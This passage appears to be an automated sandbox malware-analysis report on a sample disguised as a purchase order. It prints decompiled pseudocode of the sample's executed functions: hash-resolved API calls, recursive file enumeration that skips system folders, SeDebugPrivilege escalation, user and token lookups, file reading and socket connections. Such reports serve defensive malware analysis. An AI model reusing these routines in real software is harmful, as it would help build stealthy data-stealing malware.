calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 
8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 
8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API 

                      Executed Functions

                      C-Code - Quality: 85%
                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                      				struct _WIN32_FIND_DATAW _v596;
                      				void* __ebx;
                      				void* _t35;
                      				void* _t40;
                      				int _t43;
                      				void* _t52;
                      				int _t56;
                      				intOrPtr _t60;
                      				void* _t66;
                      				void* _t73;
                      				void* _t74;
                      				WCHAR* _t98;
                      				void* _t99;
                      				void* _t100;
                      				void* _t101;
                      				WCHAR* _t102;
                      				void* _t103;
                      				void* _t104;
                      
                      				L004067C4(0xa); // executed
                      				_t72 = 0;
                      				_t100 = 0x2e;
                      				_t106 = _a16;
                      				if(_a16 == 0) {
                      					L15:
                      					_push(_a8);
                      					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                      					_t104 = _t103 + 0xc;
                      					if(_t98 == 0) {
                      						L30:
                      						__eflags = 0;
                      						return 0;
                      					}
                      					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                      					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                      					_t73 = _t35;
                      					if(_t73 == 0xffffffff) {
                      						L29:
                      						E00402BAB(_t98);
                      						goto L30;
                      					}
                      					L17:
                      					while(1) {
                      						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                      							if(_v596.dwFileAttributes != 0x10) {
                      								L21:
                      								_push( &(_v596.cFileName));
                      								_t40 = E00405B6F(_t124, L"%s\\%s", _a4); // executed
                      								_t101 = _t40;
                      								_t104 = _t104 + 0xc;
                      								if(_t101 == 0) {
                      									goto L24;
                      								}
                      								if(_a12 == 0) {
                      									E00402BAB(_t98);
                      									E00403BEF(_t73);
                      									return _t101;
                      								}
                      								_a12(_t101);
                      								E00402BAB(_t101);
                      								goto L24;
                      							}
                      							_t124 = _a20;
                      							if(_a20 == 0) {
                      								goto L24;
                      							}
                      							goto L21;
                      						} else {
                      							L24:
                      							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                      							_t43 = FindNextFileW(_t73,  &_v596); // executed
                      							if(_t43 == 0) {
                      								E00403BEF(_t73); // executed
                      								goto L29;
                      							}
                      							_t100 = 0x2e;
                      							continue;
                      						}
                      					}
                      				}
                      				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                      				if(_t102 == 0) {
                      					L14:
                      					_t100 = 0x2e;
                      					goto L15;
                      				}
                      				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                      				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                      				_t74 = _t52;
                      				if(_t74 == 0xffffffff) {
                      					L13:
                      					E00402BAB(_t102);
                      					_t72 = 0;
                      					goto L14;
                      				} else {
                      					goto L3;
                      				}
                      				do {
                      					L3:
                      					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                      						goto L11;
                      					}
                      					if(_a24 == 0) {
                      						L7:
                      						if(E00405D24( &(_v596.cFileName)) >= 3) {
                      							L9:
                      							_push( &(_v596.cFileName));
                      							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                      							_t103 = _t103 + 0xc;
                      							_a16 = _t60;
                      							_t115 = _t60;
                      							if(_t60 == 0) {
                      								goto L11;
                      							}
                      							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                      							E00402BAB(_a16);
                      							_t103 = _t103 + 0x1c;
                      							if(_t99 != 0) {
                      								E00402BAB(_t102);
                      								E00403BEF(_t74);
                      								return _t99;
                      							}
                      							goto L11;
                      						}
                      						_t66 = 0x2e;
                      						_t114 = _v596.cFileName - _t66;
                      						if(_v596.cFileName == _t66) {
                      							goto L11;
                      						}
                      						goto L9;
                      					}
                      					_push(L"Windows");
                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                      						goto L11;
                      					}
                      					_push(L"Program Files");
                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                      						goto L11;
                      					}
                      					goto L7;
                      					L11:
                      					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                      					_t56 = FindNextFileW(_t74,  &_v596); // executed
                      				} while (_t56 != 0);
                      				E00403BEF(_t74); // executed
                      				goto L13;
                      			}

                      APIs
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID: %s\%s$%s\*$Program Files$Windows
                      • API String ID: 1690352074-2009209621
                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                      				void* _v8;
                      				struct _LUID _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				struct _TOKEN_PRIVILEGES _v32;
                      				intOrPtr* _t13;
                      				void* _t14;
                      				int _t16;
                      				int _t31;
                      				void* _t32;
                      
                      				_t31 = 0;
                      				E004060AC();
                      				_t32 = __eax;
                      				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                      				_t14 =  *_t13(_t32, 0x28,  &_v8);
                      				if(_t14 != 0) {
                      					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                      					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                      					if(_t16 != 0) {
                      						_push(__ebx);
                      						_v32.Privileges = _v16.LowPart;
                      						_v32.PrivilegeCount = 1;
                      						_v24 = _v16.HighPart;
                      						_v20 = 2;
                      						E004031E5(1, 9, 0xc1642df2, 0, 0);
                      						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                      						_t31 =  !=  ? 1 : 0;
                      					}
                      					E00403C40(_v8);
                      					return _t31;
                      				}
                      				return _t14;
                      			}

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                      • String ID: SeDebugPrivilege
                      • API String ID: 3615134276-2896544425
                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402B7C(long _a4) {
                      				void* _t4;
                      				void* _t7;
                      
                      				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                      				_t7 = _t4;
                      				if(_t7 != 0) {
                      					E00402B4E(_t7, 0, _a4);
                      				}
                      				return _t7;
                      			}






                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406069(WCHAR* _a4, DWORD* _a8) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                      				_t4 = GetUserNameW(_a4, _a8); // executed
                      				return _t4;
                      			}






                      APIs
                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                      C-Code - Quality: 75%
                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                      				int _v8;
                      				long _v12;
                      				int _v16;
                      				int _v20;
                      				char _v24;
                      				char _v28;
                      				char _v32;
                      				intOrPtr* _t25;
                      				int _t27;
                      				int _t30;
                      				int _t31;
                      				int _t36;
                      				int _t37;
                      				intOrPtr* _t39;
                      				int _t40;
                      				long _t44;
                      				intOrPtr* _t45;
                      				int _t46;
                      				void* _t48;
                      				int _t49;
                      				void* _t67;
                      				void* _t68;
                      				void* _t74;
                      
                      				_t48 = __ebx;
                      				_t67 = 0;
                      				_v8 = 0;
                      				E00402BF2();
                      				_t68 = __eax;
                      				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                      				_t2 =  &_v8; // 0x414449
                      				_push(1);
                      				_push(8);
                      				_push(_t68);
                      				if( *_t25() != 0) {
                      					L4:
                      					_t27 = E00402B7C(0x208);
                      					_v20 = _t27;
                      					__eflags = _t27;
                      					if(_t27 != 0) {
                      						E0040338C(_t27, _t67, 0x104);
                      						_t74 = _t74 + 0xc;
                      					}
                      					_push(_t48);
                      					_t49 = E00402B7C(0x208);
                      					__eflags = _t49;
                      					if(_t49 != 0) {
                      						E0040338C(_t49, _t67, 0x104);
                      						_t74 = _t74 + 0xc;
                      					}
                      					_v28 = 0x208;
                      					_v24 = 0x208;
                      					_t7 =  &_v8; // 0x414449
                      					_v12 = _t67;
                      					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                      					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                      					__eflags = _t30;
                      					if(_t30 == 0) {
                      						_t36 = E00402B7C(_v12);
                      						_v16 = _t36;
                      						__eflags = _t36;
                      						if(_t36 != 0) {
                      							_t14 =  &_v8; // 0x414449, executed
                      							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                      							__eflags = _t37;
                      							if(_t37 != 0) {
                      								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                      								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                      								__eflags = _t40;
                      								if(__eflags != 0) {
                      									_t67 = E00405B6F(__eflags, L"%s", _t49);
                      								}
                      							}
                      							E00402BAB(_v16);
                      						}
                      					}
                      					__eflags = _v8;
                      					if(_v8 != 0) {
                      						E00403C40(_v8); // executed
                      					}
                      					__eflags = _t49;
                      					if(_t49 != 0) {
                      						E00402BAB(_t49);
                      					}
                      					_t31 = _v20;
                      					__eflags = _t31;
                      					if(_t31 != 0) {
                      						E00402BAB(_t31);
                      					}
                      					return _t67;
                      				}
                      				_t44 = GetLastError();
                      				if(_t44 == 0x3f0) {
                      					E004060AC();
                      					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                      					_t3 =  &_v8; // 0x414449
                      					_t46 =  *_t45(_t44, 8, _t3);
                      					__eflags = _t46;
                      					if(_t46 == 0) {
                      						goto L2;
                      					}
                      					goto L4;
                      				}
                      				L2:
                      				return 0;
                      			}



























                      APIs
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                      • _wmemset.LIBCMT ref: 00406244
                      • _wmemset.LIBCMT ref: 00406261
                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wmemset$ErrorInformationLastToken
                      • String ID: IDA$IDA
                      • API String ID: 487585393-2020647798
                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                      C-Code - Quality: 37%
                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				void _v40;
                      				void* _t23;
                      				signed int _t24;
                      				signed int* _t25;
                      				signed int _t30;
                      				signed int _t31;
                      				signed int _t33;
                      				signed int _t41;
                      				void* _t42;
                      				signed int* _t43;
                      
                      				_v8 = _v8 & 0x00000000;
                      				_t33 = 8;
                      				memset( &_v40, 0, _t33 << 2);
                      				_v32 = 1;
                      				_t23 =  &_v40;
                      				_v28 = 6;
                      				_v36 = 2;
                      				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                      				if(_t23 == 0) {
                      					_t24 = E00402B7C(4);
                      					_t43 = _t24;
                      					_t31 = _t30 | 0xffffffff;
                      					 *_t43 = _t31;
                      					_t41 = _v8;
                      					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                      					 *_t43 = _t24;
                      					if(_t24 != _t31) {
                      						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                      						if(_t24 == _t31) {
                      							E00404DE5(_t24,  *_t43);
                      							 *_t43 = _t31;
                      						}
                      						__imp__freeaddrinfo(_v8);
                      						if( *_t43 != _t31) {
                      							_t25 = _t43;
                      							goto L10;
                      						} else {
                      							E00402BAB(_t43);
                      							L8:
                      							_t25 = 0;
                      							L10:
                      							return _t25;
                      						}
                      					}
                      					E00402BAB(_t43);
                      					__imp__freeaddrinfo(_v8);
                      					goto L8;
                      				}
                      				return 0;
                      			}


















                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                      C-Code - Quality: 74%
                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                      				struct _SECURITY_ATTRIBUTES* _v8;
                      				char _v12;
                      				long _v16;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t16;
                      				intOrPtr* _t25;
                      				long* _t28;
                      				void* _t30;
                      				int _t32;
                      				intOrPtr* _t33;
                      				void* _t35;
                      				void* _t42;
                      				intOrPtr _t43;
                      				long _t44;
                      				struct _OVERLAPPED* _t46;
                      
                      				_t46 = 0;
                      				_t35 = 0;
                      				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                      				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                      				_t42 = _t16;
                      				_v8 = _t42;
                      				if(_t42 == 0xffffffff) {
                      					__eflags = _a12;
                      					if(_a12 == 0) {
                      						L10:
                      						return _t35;
                      					}
                      					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                      					__eflags = _t43;
